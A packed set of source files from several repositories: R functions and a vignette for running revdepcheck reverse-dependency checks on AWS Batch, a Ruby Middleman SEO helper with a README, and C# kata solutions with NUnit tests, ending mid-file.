#' @inheritParams cloud_report
#' @export
cloud_job <- function(job_name = NULL, pkg = ".") {
  # An explicit job_name overrides (and becomes) the session-cached one.
  cloud_data$job_name <- job_name %||% cloud_data$job_name
  if (!is.null(cloud_data$job_name)) {
    return(invisible(cloud_data$job_name))
  }
  # No cached job: fall back to the most recently modified local results
  # directory, one level below the cloud results dir.
  pkg <- pkg_check(pkg)
  cloud <- dir_find(pkg, "cloud")
  if (dir.exists(cloud)) {
    cloud_dirs <- list.dirs(cloud, recursive = FALSE)
  } else {
    cloud_dirs <- character()
  }
  if (length(cloud_dirs) < 1) {
    stop("Can't find any previous `cloud_check()` results locally, can't discover `job_name`", call. = FALSE)
  }
  latest <- cloud_dirs[which.max(file.info(cloud_dirs)$mtime)]
  # The directory name is the job name; cache it for the rest of the session.
  cloud_data$job_name <- basename(latest)
  cli_alert_success("Most recent cloud job {.arg job_name}: {.val {cloud_data$job_name}}")
  invisible(cloud_data$job_name)
}
cloud_data <- new.env(parent = emptyenv())
# Flatten an AWS Batch list-jobs response (`x$jobSummaryList`) into a
# data.frame with one row per child job, labelled with `status`.
# Returns a zero-row frame with the same columns when the response is empty.
# AWS timestamps are epoch milliseconds, hence the / 1000 before POSIXct.
list_job_to_tbl <- function(x, status) {
  if (length(x$jobSummaryList) == 0) {
    return(
      data.frame(
        name = character(),
        index = integer(),
        created = .POSIXct(double()),
        started = .POSIXct(double()),
        stopped = .POSIXct(double()),
        status = character(),
        stringsAsFactors = FALSE
      )
    )
  }
  # NOTE(review): assumes every job summary carries createdAt/startedAt/
  # stoppedAt and an array index -- confirm for jobs that never started.
  data.frame(
    name = x$jobSummaryList$jobId,
    index = x$jobSummaryList$arrayProperties$index,
    created = .POSIXct(x$jobSummaryList$createdAt / 1000),
    started = .POSIXct(x$jobSummaryList$startedAt / 1000),
    stopped = .POSIXct(x$jobSummaryList$stoppedAt / 1000),
    status = status,
    stringsAsFactors = FALSE
  )
}
#' Plot the running time per package of a cloud job
#'
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_plot <- function(job_name = cloud_job()) {
  job_info <- cloud_job_info(job_name)
  # Map each package to its zero-based AWS Batch array index so job rows can
  # be joined back to package names.
  packages <- data.frame(
    index = seq_along(job_info$revdep_packages) - 1,
    package = unlist(job_info$revdep_packages),
    stringsAsFactors = FALSE
  )
  succeeded <- list_job_to_tbl(cloud_job_status(job_name, "SUCCEEDED"), "succeeded")
  failed <- list_job_to_tbl(cloud_job_status(job_name, "FAILED"), "failed")
  data <- rbind(succeeded, failed)
  data <- merge(data, packages)
  # Order the y axis by finish time, most recently finished first.
  data$package <- forcats::fct_reorder(data$package, data$stopped, .desc = TRUE)
  # One horizontal segment per package: from time-in-queue-until-start to
  # time-until-stop (both relative to job creation), coloured by outcome.
  ggplot2::ggplot(data) +
    ggplot2::geom_segment(
      ggplot2::aes(
        y = package,
        yend = ggplot2::after_stat(y),
        x = hms::as_hms(started - created),
        xend = hms::as_hms(stopped - created),
        color = status
      )
    ) +
    ggplot2::scale_color_manual(values = c("succeeded" = "darkgrey", "failed" = "red")) +
    ggplot2::scale_y_discrete(guide = ggplot2::guide_axis(check.overlap = TRUE)) +
    ggplot2::guides(color = "none") +
    ggplot2::labs(x = NULL, y = NULL) +
    ggplot2::theme(
      panel.grid.major.y = ggplot2::element_blank(),
      panel.grid.minor.y = ggplot2::element_blank()
    )
}
utils::globalVariables(c("package", "y", "started", "created", "stopped"))
# Fetch the stored metadata for a cloud job from the check web service
# (callers use fields such as batch_job_id and the ordered revdep_packages
# list). Authenticates via the RSTUDIO_CLOUD_REVDEP_KEY environment variable.
cloud_job_info <- function(job_name = cloud_job()) {
  response <- GET("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
    config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
    path = paste0("staging/check", "/", job_name),
    encode = "json"
  )
  cloud_stop_for_status(response)
  content(response, simplifyVector = TRUE)
}
# Query the per-package AWS Batch child jobs of `job_name`, optionally
# filtered to a single AWS Batch job state ("ALL" returns every state).
# Authenticates via the RSTUDIO_CLOUD_REVDEP_KEY environment variable.
#
# Fixed: the choices previously contained the typo "PENDENG" (so the real
# AWS state "PENDING" could never be requested) and listed "RUNNING" twice;
# the set now matches the AWS Batch job states exactly.
cloud_job_status <- function(job_name = cloud_job(pkg = pkg), status = c("ALL", "SUBMITTED", "PENDING", "RUNNABLE", "STARTING", "RUNNING", "SUCCEEDED", "FAILED"), pkg = ".") {
  status <- match.arg(status)
  # "ALL" maps to no path suffix; a specific state becomes "/<STATE>".
  if (status == "ALL") {
    status <- ""
  } else {
    status <- paste0("/", status)
  }
  response <- GET("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
    config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
    path = paste0("staging/check", "/", job_name, "/", "status", status),
    encode = "json"
  )
  # NOTE(review): cloud_job_info() uses cloud_stop_for_status() against the
  # same API; confirm whether this endpoint should match.
  stop_for_status(response)
  content(response)
}
#' Get the batch job ID for a checked package
#'
#' @inheritParams cloud_report
#' @export
cloud_job_mapping <- function(job_name = cloud_job()) {
  # Package order in the job info determines each package's zero-based AWS
  # Batch array index.
  pkgs <- cloud_job_info(job_name)$revdep_packages
  tibble::tibble(package = pkgs, id = seq_along(pkgs) - 1)
}
#' Retrieve the names broken or failed packages
#'
#' Broken packages are those whose checks got worse with the dev version.
#' Failed packages are those whose cloud jobs failed, either because the spot
#' instance was shut down by AWS or because the checks used too much memory and
#' were killed.
#' @inheritParams cloud_report
#' @param install_failures Whether to include packages that failed to install.
#' @param timeout_failures Whether to include packages that timed out.
#' @family cloud
#' @returns A character vector with the names of broken packages, to be passed to `cloud_check()`.
#' @export
cloud_broken <- function(job_name = cloud_job(pkg = pkg), pkg = ".", install_failures = FALSE, timeout_failures = FALSE) {
  results <- cloud_results(job_name = job_name, pkg = pkg)
  # Keep only the results whose checks regressed, then extract their names.
  broken_results <- Filter(
    function(res) is_broken(res, install_failures, timeout_failures),
    results
  )
  vapply(broken_results, function(res) res$package, character(1))
}
#' @rdname cloud_broken
#' @export
cloud_failed <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
  # Packages whose AWS Batch child jobs ended in the FAILED state.
  failed <- cloud_job_status(job_name, status = "FAILED")
  unlist(failed$packages)
}
#' Browse to the AWS url for the job
#'
#' This is useful for closer inspection of individual jobs while they are
#' running or after the fact.
#' @param package If `NULL` browses to the URL of the overall job. If a package
#'   name, browses to the URL for that specific package job.
#' @inheritParams cloud_report
#' @export
cloud_browse <- function(job_name = cloud_job(), package = NULL) {
  info <- cloud_job_info(job_name)
  job_id <- info$batch_job_id
  if (is.null(package)) {
    utils::browseURL(sprintf("https://console.aws.amazon.com/batch/home?region=us-east-1#/jobs/%s", job_id))
    return(invisible())
  }
  # Bug fix: cloud_job_mapping() expects the revdepcheck job *name* (it looks
  # the job up via the check API); previously the AWS Batch job id was passed
  # here, which broke the per-package lookup.
  mapping <- cloud_job_mapping(job_name)
  # Translate the package name into its AWS Batch array child index.
  array_num <- mapping$id[mapping$package == package]
  utils::browseURL(sprintf("https://console.aws.amazon.com/batch/home?region=us-east-1#/jobs/%s/child/%s:%i", job_id, job_id, array_num))
}
<file_sep>/vignettes/cloud.Rmd
---
title: "cloud"
output: rmarkdown::html_vignette
vignette: >
%\VignetteIndexEntry{cloud}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
comment = "#>"
)
```
```{r setup}
library(revdepcheck)
```
# Running reverse dependencies in the cloud
revdepcheck now supports running reverse dependencies in the AWS cloud, via a suite of functions all prefixed with `cloud_*()`.
This service is currently only available to be used by RStudio employees, but we hope to offer this service for the broader R community in the future.
## Setup
Set the `RSTUDIO_CLOUD_REVDEP_KEY` environment variable to the value of your cloud authentication key, provided to you by RStudio DevOps.
Add this key to your `.Renviron` file with `usethis::edit_r_environ()` and restart R.
## Usage
**Note** If you are going to be running 500+ tests and are using a development dependency (e.g. `Remote: org/pkg`) you may exhaust the GitHub API limits. A workaround is to use a 'url' remote, e.g. `Remote: url::https://github.com/org/pkg/archive/master.tar.gz`, which does not use the GitHub API.
```r
# Kickoff a new check
# The devel package is automatically built from the current
# working directory, or specify a pre-built package with `tarball`.
cloud_check()
# Follow current status of the job
cloud_status()
# Cancel a job
cloud_cancel()
# Retrieve results (if needed) and show a summary
cloud_summary()
# Retrieve results (if needed) and generate a markdown report
cloud_report()
# Retrieve details of a specific package
cloud_details(, "pkgXYZ")
# Plot running time for each package in a job
cloud_plot()
# Email maintainers with failures
cloud_email()
# Retrieve packages that broke in a given job
cloud_broken()
# Open a web browser to the AWS job pane for the current job
cloud_browse()
# Open the browser to the AWS job for a particular package
# Useful for debugging why a particular job failed
cloud_browse(package = "xyz")
```
The functions all keep track of the most recently submitted `job_name`, so assuming you only have one job in a given R session you can call the functions without additional parameters.
Provide the `job_name` explicitly otherwise; results are written to a directory named after the `job_name` under `revdep/`.
The `cloud_*()` functions assume your current working directory is in the root directory of the package you are trying to run reverse dependencies for.
If this is not the case all `cloud_*()` functions take a `pkg` parameter, so you can specify a different directory if needed.
| 30eb33b9f7963b89c4891738f74f983a1ee0ff68 | [
"R",
"RMarkdown"
] | 2 | R | cderv/revdepcheck | 1ba55f7d592091ea529e31be99dbde0d822d6dd1 | 385d3650b394720705e8105c50ebd9260255a28c |
refs/heads/master | <repo_name>SamuelBourdon/seven_minutes_workout<file_sep>/helpers/page_helper.rb
# View helpers for per-page SEO metadata (title, description, canonical URL).
# Each helper falls back to the site-wide defaults in `data.settings.site`
# when the page's frontmatter does not provide an override.
module PageHelper
  # Page <title>: frontmatter `title_seo` wins, then `title`, then the
  # site-wide default. (Idiom fix: the redundant `a ? a : b` ternaries are
  # replaced by equivalent `||` chains.)
  def page_title(page = current_page)
    page.data.title_seo || page.data.title || data.settings.site.title
  end

  # Meta description: frontmatter `description`, else the site default.
  def page_description(page = current_page)
    page.data.description || data.settings.site.description
  end

  # Absolute URL of the page (site base URL + page path).
  def page_url(page = current_page)
    data.settings.site.url + page.url
  end
end
# Seven Minutes Workout
Application adaptée du livre AngularJS by example
## Modifications
* Contenu de l'app en français
* Intégration d'AngularJS dans Middleman
## License
This project is free software, and may be redistributed under the [MIT license](https://opensource.org/licenses/MIT).
| e68d476df0bf776956bc3e5598e3ef8e10a358b6 | [
"Markdown",
"Ruby"
] | 2 | Ruby | SamuelBourdon/seven_minutes_workout | 3a22036f53a7259c46438c48beadcdce9be2c899 | d2a76a6917e18b21cca67447094c7d9e6fc0ac77 |
refs/heads/master | <repo_name>gsach20/Kata<file_sep>/ConsoleApplication1/ConsoleApplication1/FactDecomp.cs
using System;
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
/// <summary>
/// Builds the prime factorization of n! (n factorial) as a string such as
/// "2^15 * 3^6 * 5^3 * 7^2 * 11 * 13 * 17" — primes ascending, the "^"
/// omitted when the exponent is 1.
/// </summary>
class FactDecomp
{
    public static string Decomp(int n)
    {
        // n! = 1 for n < 2. The previous implementation still emitted its
        // seeded prime 2 (exponent 0), rendered as "2"; preserved here for
        // backward compatibility.
        if (n < 2) return "2";
        List<string> parts = new List<string>();
        foreach (int prime in PrimesUpTo(n))
        {
            // Legendre's formula gives each prime's exponent directly,
            // replacing the old per-number trial division (much faster).
            int exponent = LegendreExponent(n, prime);
            parts.Add(exponent > 1 ? prime + "^" + exponent : prime.ToString());
        }
        return string.Join(" * ", parts);
    }

    // Sieve of Eratosthenes: yields every prime <= limit in ascending order.
    private static IEnumerable<int> PrimesUpTo(int limit)
    {
        bool[] composite = new bool[limit + 1];
        for (int candidate = 2; candidate <= limit; candidate++)
        {
            if (composite[candidate]) continue;
            yield return candidate;
            // long arithmetic so candidate * candidate cannot overflow.
            for (long multiple = (long)candidate * candidate; multiple <= limit; multiple += candidate)
                composite[multiple] = true;
        }
    }

    // Legendre's formula: the exponent of prime p in n! is
    // floor(n/p) + floor(n/p^2) + floor(n/p^3) + ...
    private static int LegendreExponent(int n, int p)
    {
        int exponent = 0;
        for (long power = p; power <= n; power *= p)
            exponent += n / (int)power;
        return exponent;
    }

    // Retained for backward compatibility: the original implementation
    // exposed this public nested type, so external code may reference it.
    public class Pair<T, U>
    {
        public Pair(T primeNumber, U count)
        {
            PrimeNumber = primeNumber;
            Count = count;
        }
        public T PrimeNumber { get; set; }
        public U Count { get; set; }
    }
}
// NUnit fixture for FactDecomp.Decomp: checks the formatted factorization
// of n! for a handful of known values.
[TestFixture]
public class FactDecompTest
{
    // Logs the case being checked, then asserts the exact expected string.
    private static void testing(int n, string expected)
    {
        Console.WriteLine("n: {0}, expected: {1}", n, expected);
        Assert.AreEqual(expected, FactDecomp.Decomp(n));
    }
    [Test]
    public static void test()
    {
        testing(17, "2^15 * 3^6 * 5^3 * 7^2 * 11 * 13 * 17");
        testing(5, "2^3 * 3 * 5");
        testing(22, "2^19 * 3^9 * 5^4 * 7^3 * 11^2 * 13 * 17 * 19");
        testing(14, "2^11 * 3^5 * 5^2 * 7^2 * 11 * 13");
        testing(25, "2^22 * 3^10 * 5^6 * 7^3 * 11^2 * 13 * 17 * 19 * 23");
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/TotalAreaCoveredByRectangles.cs
using System;
using System.Collections.Generic;
using System.Linq;
using Castle.Components.DictionaryAdapter;
using NUnit.Framework;
using static NUnit.Framework.Assert;
namespace ConsoleApplication1
{
    /// <summary>
    /// Computes the total area of the union of axis-aligned rectangles,
    /// counting overlapping regions only once. Each rectangle is an int[4]
    /// {x1, y1, x2, y2}: bottom-left and top-right corners.
    /// </summary>
    class TotalAreaCoveredByRectangles
    {
        // Indices into the int[4] rectangle representation.
        private const int X1 = 0;
        private const int Y1 = 1;
        private const int X2 = 2;
        private const int Y2 = 3;
        public static int Calculate(IEnumerable<int[]> rectangles)
        {
            // Sorting by left edge lets CheckRemaining stop scanning as soon
            // as a rectangle starts at or beyond the current one's right edge.
            List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
            return CheckRemaining(rectanglesList, 0);
        }
        // Recursive inclusion-exclusion: union area of rectangles[i..] =
        // area(first) - area(union of its intersections with later ones)
        // + union area of the later ones. `rectangles` must be sorted by X1.
        private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
        {
            int remainingCount = rectangles.Count - currentIndex;
            if (remainingCount == 0) return 0;
            int[] rectangle1 = rectangles[currentIndex];
            int rectangle1Area = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]);
            if (remainingCount == 1) return rectangle1Area;
            int nextIndex = currentIndex + 1;
            List<int[]> intersectionRectangles = new List<int[]>();
            foreach (var rectangle2 in rectangles.Skip(nextIndex))
            {
                // Sorted by X1, so no later rectangle can overlap either.
                if (rectangle2[X1] >= rectangle1[X2]) break;
                int y1, y2;
                if (IntersectionCordinates(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2], out y1, out y2) > 0)
                {
                    // The overlap rectangle; its x-range is clipped to
                    // rectangle1. Insertion order keeps the list X1-sorted.
                    intersectionRectangles.Add(new[] { rectangle2[X1], y1, rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2], y2 });
                }
            }
            int netArea = rectangle1Area - CheckRemaining(intersectionRectangles, 0);
            netArea += CheckRemaining(rectangles, nextIndex);
            return netArea;
        }
        // 1-D interval intersection of [bottom1, top1) and [bottom2, top2);
        // outputs the overlap bounds and returns its length (0 if disjoint).
        private static int IntersectionCordinates(int bottom1, int top1, int bottom2, int top2, out int bottom, out int top)
        {
            if (bottom2 >= bottom1)
            {
                if (bottom2 >= top1)
                {
                    bottom = 0;
                    top = 0;
                    return 0;
                }
                bottom = bottom2;
                top = top2 <= top1 ? top2 : top1;
            }
            else
            {
                if (top2 <= bottom1)
                {
                    bottom = 0;
                    top = 0;
                    return 0;
                }
                bottom = bottom1;
                top = top1 <= top2 ? top1 : top2;
            }
            return top - bottom;
        }
    }
    /// <summary>
    /// Earlier iteration kept in the file for reference; the logic is
    /// identical to TotalAreaCoveredByRectangles (recursive
    /// inclusion-exclusion over rectangles sorted by left edge).
    /// </summary>
    class TotalAreaCoveredByRectangles3
    {
        // Indices into the int[4] rectangle representation.
        private const int X1 = 0;
        private const int Y1 = 1;
        private const int X2 = 2;
        private const int Y2 = 3;
        public static int Calculate(IEnumerable<int[]> rectangles)
        {
            // Sort by left edge so the scan below can stop early.
            List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
            return CheckRemaining(rectanglesList, 0);
        }
        // Union area of rectangles[currentIndex..] via inclusion-exclusion.
        private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
        {
            int remainingCount = rectangles.Count - currentIndex;
            if (remainingCount == 0) return 0;
            int[] rectangle1 = rectangles[currentIndex];
            int rectangle1Area = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]);
            if (remainingCount == 1) return rectangle1Area;
            int nextIndex = currentIndex + 1;
            List<int[]> intersectionRectangles = new List<int[]>();
            foreach (var rectangle2 in rectangles.Skip(nextIndex))
            {
                // Sorted input: later rectangles cannot overlap either.
                if (rectangle2[X1] >= rectangle1[X2]) break;
                int y1, y2;
                if (IntersectionCordinates(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2], out y1, out y2) > 0)
                {
                    intersectionRectangles.Add(new []{ rectangle2[X1], y1, rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2], y2});
                }
            }
            int netArea = rectangle1Area - CheckRemaining( intersectionRectangles, 0);
            netArea += CheckRemaining(rectangles, nextIndex);
            return netArea;
        }
        // 1-D interval intersection; returns the overlap length (0 if none).
        private static int IntersectionCordinates(int bottom1, int top1, int bottom2, int top2, out int bottom, out int top)
        {
            if (bottom2 >= bottom1)
            {
                if (bottom2 >= top1)
                {
                    bottom = 0;
                    top = 0;
                    return 0;
                }
                bottom = bottom2;
                top = top2 <= top1 ? top2 : top1;
            }
            else
            {
                if (top2 <= bottom1)
                {
                    bottom = 0;
                    top = 0;
                    return 0;
                }
                bottom = bottom1;
                top = top1 <= top2 ? top1 : top2;
            }
            return top - bottom;
        }
    }
    /// <summary>
    /// Legacy iteration kept for reference; superseded by
    /// TotalAreaCoveredByRectangles.
    /// NOTE(review): this version subtracts only pairwise intersections and
    /// never applies inclusion-exclusion recursively, so regions covered by
    /// three or more rectangles appear to be under-counted — verify before
    /// reusing.
    /// </summary>
    class TotalAreaCoveredByRectangles2
    {
        // Indices into the int[4] rectangle representation.
        private const int X1 = 0;
        private const int Y1 = 1;
        private const int X2 = 2;
        private const int Y2 = 3;
        public static int Calculate(IEnumerable<int[]> rectangles)
        {
            List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
            return CheckRemaining(rectanglesList, 0);
        }
        // Area of rectangles[currentIndex..] minus pairwise overlaps only.
        private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
        {
            if (currentIndex >= rectangles.Count) return 0;
            int[] rectangle1 = rectangles[currentIndex];
            int nextIndex = currentIndex + 1;
            int intersectionArea = 0;
            foreach (var rectangle2 in rectangles.Skip(nextIndex))
            {
                if (rectangle2[X1] >= rectangle1[X2]) break;
                intersectionArea += ((rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2]) - rectangle2[X1]) * IntersectionLength(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2]);
            }
            int netArea = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]) - intersectionArea;
            netArea += CheckRemaining(rectangles, nextIndex);
            return netArea;
        }
        // Length of the overlap of intervals [bottom1, top1) and [bottom2, top2).
        private static int IntersectionLength(int bottom1, int top1, int bottom2, int top2)
        {
            int bottom, top;
            if (bottom2 >= bottom1)
            {
                if (bottom2 >= top1) return 0;
                bottom = bottom2;
                top = top2 <= top1 ? top2 : top1;
            }
            else
            {
                if (top2 <= bottom1) return 0;
                bottom = bottom1;
                top = top1 <= top2 ? top1 : top2;
            }
            return top - bottom;
        }
    }
    /// <summary>
    /// Legacy scratchpad of earlier attempts at the union-area problem; kept
    /// for reference and superseded by TotalAreaCoveredByRectangles. Each
    /// Calculate* method is a separate (progressively optimized) approach.
    /// NOTE(review): these variants were not retained in the test fixture and
    /// may be incorrect for some overlap configurations — verify before reuse.
    /// </summary>
    class TotalAreaCoveredByRectangles1
    {
        // Pairwise-subtraction attempt on an UNSORTED list (no early break).
        public static int Calculate(IEnumerable<int[]> rectangles)
        {
            List<int[]> rectanglesList = rectangles.ToList();
            return CheckRemaining(rectanglesList, 0);
        }
        // Subtracts each later rectangle's overlap with the current one, then
        // recurses on the remainder (pairwise only, no inclusion-exclusion).
        private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
        {
            if (currentIndex >= rectangles.Count) return 0;
            int[] c = rectangles[currentIndex++];
            int intersectionArea = 0;
            foreach (var r in rectangles.Skip(currentIndex))
                intersectionArea += IntersectionLength(c[0], c[2], r[0], r[2]) * IntersectionLength(c[1], c[3], r[1], r[3]);
            int netArea = (c[2] - c[0]) * (c[3] - c[1]) - intersectionArea;
            netArea += CheckRemaining(rectangles, currentIndex);
            return netArea;
        }
        // Length of the overlap of intervals [a1, a2) and [b1, b2).
        private static int IntersectionLength(int a1, int a2, int b1, int b2)
        {
            int x0, x1;
            if (b1 >= a1)
            {
                if (b1 >= a2) return 0;
                x0 = b1;
                x1 = b2 <= a2 ? b2 : a2;
            }
            else
            {
                if (b2 <= a1) return 0;
                x0 = a1;
                x1 = a2 <= b2 ? a2 : b2;
            }
            return x1 - x0;
        }
        // Indices into the int[4] rectangle representation.
        private const int X0 = 0;
        private const int Y0 = 1;
        private const int X1 = 2;
        private const int Y1 = 3;
        // Area of the 2-D intersection of two rectangles (0 if disjoint).
        private static int Intersection1(int[] rectangle1, int[] rectangle2)
        {
            int x0, y0, x1, y1;
            if (rectangle2[X0] >= rectangle1[X0])
            {
                if (rectangle2[X0] >= rectangle1[X1]) return 0;
                x0 = rectangle2[X0];
                x1 = rectangle2[X1] <= rectangle1[X1] ? rectangle2[X1] : rectangle1[X1];
            }
            else
            {
                if (rectangle2[X1] <= rectangle1[X0]) return 0;
                x0 = rectangle1[X0];
                x1 = rectangle1[X1] <= rectangle2[X1] ? rectangle1[X1] : rectangle2[X1];
            }
            if (rectangle2[Y0] >= rectangle1[Y0])
            {
                if (rectangle2[Y0] >= rectangle1[Y1]) return 0;
                y0 = rectangle2[Y0];
                y1 = rectangle2[Y1] <= rectangle1[Y1] ? rectangle2[Y1] : rectangle1[Y1];
            }
            else
            {
                if (rectangle2[Y1] <= rectangle1[Y0]) return 0;
                y0 = rectangle1[Y0];
                y1 = rectangle1[Y1] <= rectangle2[Y1] ? rectangle1[Y1] : rectangle2[Y1];
            }
            return (x1 - x0) * (y1 - y0);
        }
        // Column-sweep attempt: for each unit x-column, merge y-extents into
        // at most a growing "last patch" (relies on processing rectangles in
        // ascending y0 order).
        public static int Calculate3(IEnumerable<int[]> rectangles)
        {
            int x0 = 0;
            int y0 = 1;
            int x1 = 2;
            int y1 = 3;
            Dictionary<int, List<int[]>> squares = new Dictionary<int, List<int[]>>();
            foreach (int[] rectangle in rectangles.OrderBy(r => r[y0]))
            {
                for (int x = rectangle[x0]; x < rectangle[x1]; x++)
                {
                    List<int[]> yPatches;
                    squares.TryGetValue(x, out yPatches);
                    if (yPatches == null)
                    {
                        // Sentinel patch [0, 0) simplifies the merge below.
                        yPatches = new List<int[]>(new[] {new[] {0, 0}});
                        squares.Add(x, yPatches);
                    }
                    int[] lastPatch = yPatches[yPatches.Count-1];
                    if (rectangle[y1] <= lastPatch[1]) continue;
                    if (rectangle[y0] <= lastPatch[1])
                    {
                        // Overlaps/touches the last patch: extend it upward.
                        lastPatch[1] = rectangle[y1];
                    }
                    else
                    {
                        // Disjoint: start a new patch above the last one.
                        yPatches.Add(new[] {rectangle[y0], rectangle[y1]});
                    }
                }
            }
            // Total area = sum of patch heights (each column is 1 unit wide).
            int area = 0;
            foreach (List<int[]> yPatches in squares.Values)
            {
                foreach (int[] yPatch in yPatches)
                {
                    area += yPatch[1] - yPatch[0];
                }
            }
            return area;
        }
        // Column-sweep attempt using a linked list of y-intervals per column,
        // merging the newly inserted interval into its neighbours in place.
        public static int Calculate2(IEnumerable<int[]> rectangles)
        {
            SortedDictionary<int, LinkedList<int[]>> squares = new SortedDictionary<int, LinkedList<int[]>>();
            foreach (int[] rectangle in rectangles)
            {
                for (int x = rectangle[0]; x < rectangle[2]; x++)
                {
                    LinkedList<int[]> yPatches;
                    squares.TryGetValue(x, out yPatches);
                    if (yPatches == null)
                    {
                        yPatches = new LinkedList<int[]>();
                        squares.Add(x, yPatches);
                    }
                    // Insert the new interval at the front, then merge/slide
                    // it rightwards until the list is disjoint again.
                    yPatches.AddFirst(new LinkedListNode<int[]>(new[] {rectangle[1], rectangle[3]}));
                    LinkedListNode<int[]> currentNode = yPatches.First;
                    while (currentNode != null)
                    {
                        LinkedListNode<int[]> nextNode = currentNode.Next;
                        if (nextNode == null)
                        {
                            break;
                        }
                        if (currentNode.Value[1] < nextNode.Value[0])
                        {
                            break;
                        }
                        if (currentNode.Value[1] < nextNode.Value[1])
                        {
                            if (currentNode.Value[0] < nextNode.Value[0])
                            {
                                // Partial overlap: absorb the next interval.
                                currentNode.Value[1] = nextNode.Value[1];
                                yPatches.Remove(nextNode);
                            }
                            else
                            {
                                // Fully contained in next: drop the new one.
                                yPatches.Remove(currentNode);
                            }
                            break;
                        }
                        if (currentNode.Value[0] < nextNode.Value[0])
                        {
                            // New interval covers next entirely: remove next.
                            yPatches.Remove(nextNode);
                        }
                        else if (currentNode.Value[0] < nextNode.Value[1])
                        {
                            // Overlap from below: extend downward, drop next.
                            currentNode.Value[0] = nextNode.Value[0];
                            yPatches.Remove(nextNode);
                        }
                        else
                        {
                            // New interval lies beyond next: move it along.
                            yPatches.AddAfter(nextNode, new LinkedListNode<int[]>(currentNode.Value));
                            yPatches.Remove(currentNode);
                            currentNode = nextNode.Next;
                        }
                    }
                }
            }
            int area = 0;
            foreach (LinkedList<int[]> yPatches in squares.Values)
            {
                foreach (int[] yPatch in yPatches)
                {
                    area += yPatch[1] - yPatch[0];
                }
            }
            return area;
        }
        // Brute-force baseline: mark every covered unit square in a per-column
        // set; the union area is the total number of marked squares.
        public static int Calculate1(IEnumerable<int[]> rectangles)
        {
            SortedDictionary<int, SortedSet<int>> squares = new SortedDictionary<int, SortedSet<int>>();
            foreach (int[] rectangle in rectangles)
            {
                for (int x = rectangle[0]; x < rectangle[2]; x++)
                {
                    SortedSet<int> ySet;
                    squares.TryGetValue(x, out ySet);
                    if (ySet == null)
                    {
                        ySet = new SortedSet<int>();
                        squares.Add(x, ySet);
                    }
                    for (int y = rectangle[1]; y < rectangle[3]; y++)
                    {
                        ySet.Add(y);
                    }
                }
            }
            int area = 0;
            foreach (SortedSet<int> ySet in squares.Values)
            {
                area += ySet.Count;
            }
            return area;
        }
    }
    // NUnit tests for TotalAreaCoveredByRectangles.Calculate: empty input,
    // single rectangles, disjoint pairs, containment, and multi-way overlaps.
    [TestFixture]
    class TotalAreaCoveredByRectanglesTests
    {
        [Test]
        public void ZeroRectangles()
        {
            AreEqual(0, TotalAreaCoveredByRectangles.Calculate(Enumerable.Empty<int[]>()));
        }
        [Test]
        public void OneRectangle()
        {
            AreEqual(1, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 } }));
        }
        [Test]
        public void OneRectangleV2()
        {
            AreEqual(22, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 4, 11, 6 } }));
        }
        [Test]
        public void TwoRectangles()
        {
            AreEqual(2, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 }, new[] { 1, 1, 2, 2 } }));
        }
        [Test]
        public void TwoRectanglesV2()
        {
            // The second rectangle fully contains the first.
            AreEqual(4, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 }, new[] { 0, 0, 2, 2 } }));
        }
        [Test]
        public void ThreeRectangles()
        {
            AreEqual(36, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 3, 3, 8, 5 }, new[] { 6, 3, 8, 9 }, new[] { 11, 6, 14, 12 } }));
        }
        [Test]
        public void RectanglesWithSimpleIntersections()
        {
            AreEqual(5, TotalAreaCoveredByRectangles.Calculate(new[] {
                new[] { 1,4,2,7 },
                new[] { 1,4,2,6 },
                new[] { 1,4,4,5 }}));
        }
        [Test]
        public void RectanglesWithSimpleIntersections2()
        {
            // Three identical rectangles must be counted once.
            AreEqual(1, TotalAreaCoveredByRectangles.Calculate(new[] {
                new[] { 1,1,2,2 },
                new[] { 1,1,2,2 },
                new[] { 1,1,2,2 }}));
        }
        [Test]
        public void RectanglesWithSimpleIntersections1()
        {
            AreEqual(21, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 1,1,2,2 },
                new[] { 1,4,2,7 },
                new[] { 1,4,2,6 },
                new[] { 1,4,4,5 },
                new[] { 2,5,6,7 },
                new[] { 4,3,7,6}}));
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/BaseClass1.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ConsoleApplication1
{
    /// <summary>
    /// Demo base class exposing a virtual method for override experiments.
    /// </summary>
    class BaseClass1
    {
        // Writes a marker to stdout so overriding classes can be told apart
